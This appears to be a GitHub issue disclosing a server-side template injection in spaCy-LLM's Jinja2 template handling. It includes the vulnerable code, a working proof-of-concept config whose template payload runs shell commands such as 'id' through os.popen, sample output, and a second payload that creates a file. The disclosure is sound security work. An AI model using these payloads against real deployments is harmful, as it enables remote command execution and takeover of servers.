spacy-llm icon indicating copy to clipboard operation
spacy-llm copied to clipboard

Server Side Template Injection in SpaCy-LLM allows Remote Command Execution

Open edoardottt opened this issue 1 year ago • 0 comments

Summary

A Server Side Template Injection in SpaCy-LLM caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.

Details

Installation Steps

python -m venv .env
source .env/bin/activate
pip install -U pip setuptools wheel
pip install -U spacy
python -m pip install spacy-llm
python -m spacy download en_core_web_sm

The vulnerability is caused by the usage of vulnerable functions of Jinja2 template engine (https://github.com/explosion/spacy-llm/blob/main/spacy_llm/tasks/builtin_task.py).

def generate_prompts(
...
    environment = jinja2.Environment()
    _template = environment.from_string(self._template)
...
def render_template(shard: Doc, i_shard: int, i_doc: int, n_shards: int) -> str:
...
            return _template.render(
                text=shard.text,
                prompt_examples=self._prompt_examples,
                **self._get_prompt_data(shard, i_shard, i_doc, n_shards),
            )

PoC

import spacy

nlp = spacy.load("en_core_web_sm")

config = {
    "task": {
        "@llm_tasks": "spacy.Summarization.v1",
        "max_n_words": 100,
        "template": "{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}",
    },
    "model": {"@llm_models": "spacy.Dolly.v1", "name": "dolly-v2-3b"},
    "save_io": True,
}

llm = nlp.add_pipe("llm", config=config)
doc = "test"
doc = nlp(doc)
print(doc.user_data["llm_io"]["llm"]["prompt"])

# ['uid=1000(edoardottt) gid=1000(edoardottt) groups=1000(edoardottt), ...']

Another payload could be {{self.__init__.__globals__.__builtins__.__import__('os').popen('touch pwned')}}, which immediately creates a file called 'pwned' as soon the api is called. Read more about Jinja2 SSTI here https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.

Note that:

  1. save_io set to True is useful for reading the generated prompt, in a real-case scenario is not needed.
  2. The vulnerability lies in template field, all other fields are set for the Proof of Concept. An attacker doesn't need to control those.
  3. The vulnerability has been fixed here, but v0.7.2 is still vulnerable.

Impact

Attackers can run arbitrary system command without any restriction (e.g. they could use a reverse shell and gain access to the server) . The impact is critical as the attacker can completely takeover the server host.

Credits

Edoardo Ottavianelli

edoardottt avatar Jan 09 '25 09:01 edoardottt